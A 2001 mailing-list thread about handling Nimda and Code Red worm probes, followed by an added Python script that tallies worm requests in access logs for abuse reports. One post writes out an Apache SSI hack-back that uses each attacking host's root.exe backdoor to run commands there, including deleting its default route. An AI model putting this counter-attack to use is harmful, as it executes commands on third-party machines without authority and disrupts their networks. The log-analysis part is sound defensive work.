Probably not a good idea. Does anyone remember the recent story about a
gentleman who now has criminal charges pending against him because
(trying to be helpful) he notified a company that their FrontPage server
extensions allowed anyone to access their server?
This could really backfire on you...
On Mon, 24 Sep 2001, Paul Chvostek wrote:
>
> Hi Asgard.
>
> I don't think you'll have any luck collecting the $1 per attack. My
> approach is simpler, though likely to raise eyebrows. Input from
> lawyers would be especially welcome. ;)
>
> My assumptions are:
> - any host which is attacking me has vulnerabilities which should have
> been patched months ago, and
> - any unpatched server is being run by administrators or companies who
> don't care enough about system uptime to implement proper security.
>
> I've created a default.ida file in my web root, and added lines to
> Apache's httpd.conf to turn .ida files into SSI. My default.ida is:
>
> <p>This host is immune to Code Red. Upgrade to a real operating system.</p>
> <!--#exec cmd="/usr/local/bin/lynx -dump
> http://$REMOTE_HOST/scripts/root.exe\?/c+net+send+localhost+%22Your+webserver+has+been+infected+with+the+CodeRed2+worm.+You+should+fix+it+before+script+kiddie+comes+along+and+take+advantage+of+it+again.+Remove+root.exe+and+shell.exe+from+c:%5Cinetpub%5Cscripts+\(or+wherever+your+CGI+scripts+live\),+and+install+a+bloody+virus+scanner.%22"
> -->
> <!--#exec cmd="/usr/local/bin/lynx -dump
> http://$REMOTE_HOST/scripts/root.exe\?/c+route+delete+0.0.0.0" -->
>
> If all goes as planned, the effect is to put a message on the console,
> and remove the default route on the host thereby protecting the Internet
> and forcing someone to look at the console.
>
> Note that this *only* catches machines which have been infected with
> CodeRed2, which leaves a leftover /scripts/root.exe to play with.
> If someone wants to tell me how to do this with some of the other
> vulnerabilities that Nimda tries to use, I'd be grateful. :)
>
> p
>
>
> On Sat, Sep 22, 2001 at 10:42:07PM +0200, Asgard Hostmaster wrote:
> >
> > Hi,
> >
> > Thought I'd post this here as this group seems to be one of the most
> > eclectic and knowledgeable around. We're all aware of the current NIMDA
> > worm attacks. I recently modified my IIS 404 error page to do a netblock
> > lookup on the IP of the server trying to attack ours and then email the
> > netblock owner and store the information in a database. Since doing that
> > a little over 24hrs ago we've received 84807 attacks from 101 separate
> > servers.
> >
> > Considering this worm uses exploits that got massive publicity with Code
> > Red, I'm wondering about liability of companies that continue to run
> > vulnerable servers? I'm seriously considering automatically reviewing
> > all ip addresses 24hrs after they've first attacked and if I'm
> > still being attacked giving them a further 6 or 12 hours and then I'll
> > charge them $1/attack until it stops. For god's sake it's a 15 min job
> > at most to actually stop the virus, though longer to fully check and
> > clear the server. Perhaps this sort of action might convince some people
> > to finally take server patching seriously? Thoughts folks? Any lawyers
> > on the list interested in taking it up? :-)
> >
> > Cheers,
> > david
>
> --
> Paul Chvostek <[EMAIL PROTECTED]>
> Operations / Development / Abuse / Whatever vox: +1 416 598-0000
> IT Canada http://www.it.ca/
>
>
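Added example, not code from anyone in this thread: the logging and attribution half of what the Asgard post describes (record each worm probe, attribute it to a source host, re-check which sources are still at it 24 hours after their first hit), done offline from access logs rather than from a live 404 handler. It assumes Apache/IIS-style common log format and matches only the two worm paths the thread itself names (/default.ida for Code Red, /scripts/root.exe for the CodeRed2 leftover). The netblock lookup, the outgoing mail and the per-attack charge are left to the operator, and the sample log lines are constructed.

```python
import re
from datetime import datetime, timedelta

# Request-path fragments the thread itself names as worm artefacts:
# /default.ida is the Code Red target, /scripts/root.exe is the backdoor
# CodeRed2 leaves behind (and Nimda reuses). Extend as needed.
PROBE_SIGNATURES = {
    "code-red": "/default.ida",
    "codered2-root-exe": "/scripts/root.exe",
}

# Assumption: Apache/IIS-style common log format. Constructed sample lines,
# not real traffic; 10.0.0.5 keeps probing for more than a day.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Sep/2001:22:40:01 +0200] "GET /default.ida?XXXX HTTP/1.0" 404 276
10.0.0.5 - - [22/Sep/2001:22:40:03 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
192.0.2.9 - - [22/Sep/2001:23:10:44 +0200] "GET /index.html HTTP/1.0" 200 1043
192.0.2.77 - - [23/Sep/2001:01:05:09 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
10.0.0.5 - - [24/Sep/2001:09:15:30 +0200] "GET /default.ida?XXXX HTTP/1.0" 404 276
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')


def parse_line(line):
    """Return (source_ip, timestamp, request_path) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, _method, path, _status = m.groups()
    when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    return ip, when, path


def classify(path):
    """Name the worm signature a request path matches, or None if it is benign."""
    lowered = path.lower()
    for name, fragment in PROBE_SIGNATURES.items():
        if fragment in lowered:
            return name
    return None


def tally_probes(log_text):
    """Per-source summary: hit count, first/last seen, and which signatures fired."""
    tally = {}
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, when, path = parsed
        sig = classify(path)
        if sig is None:
            continue
        rec = tally.setdefault(ip, {"count": 0, "first": when, "last": when, "signatures": set()})
        rec["count"] += 1
        rec["first"] = min(rec["first"], when)
        rec["last"] = max(rec["last"], when)
        rec["signatures"].add(sig)
    return tally


def still_active(tally, grace=timedelta(hours=24)):
    """Sources still probing after the grace period following their first hit."""
    return sorted(ip for ip, rec in tally.items() if rec["last"] - rec["first"] >= grace)


def abuse_report(ip, rec):
    """Plain-text summary for the netblock contact (the whois lookup is left to the operator)."""
    sigs = ", ".join(sorted(rec["signatures"]))
    return (f"Host {ip} sent {rec['count']} worm probe(s) ({sigs}) between "
            f"{rec['first'].isoformat()} and {rec['last'].isoformat()}.")


if __name__ == "__main__":
    summary = tally_probes(SAMPLE_LOG)
    for ip in still_active(summary):
        print(abuse_report(ip, summary[ip]))
```

Running it over your own access log instead of SAMPLE_LOG gives one record per probing host and a list of those still active a day after first contact, which is the evidence you would attach to an abuse report; nothing here contacts the remote host.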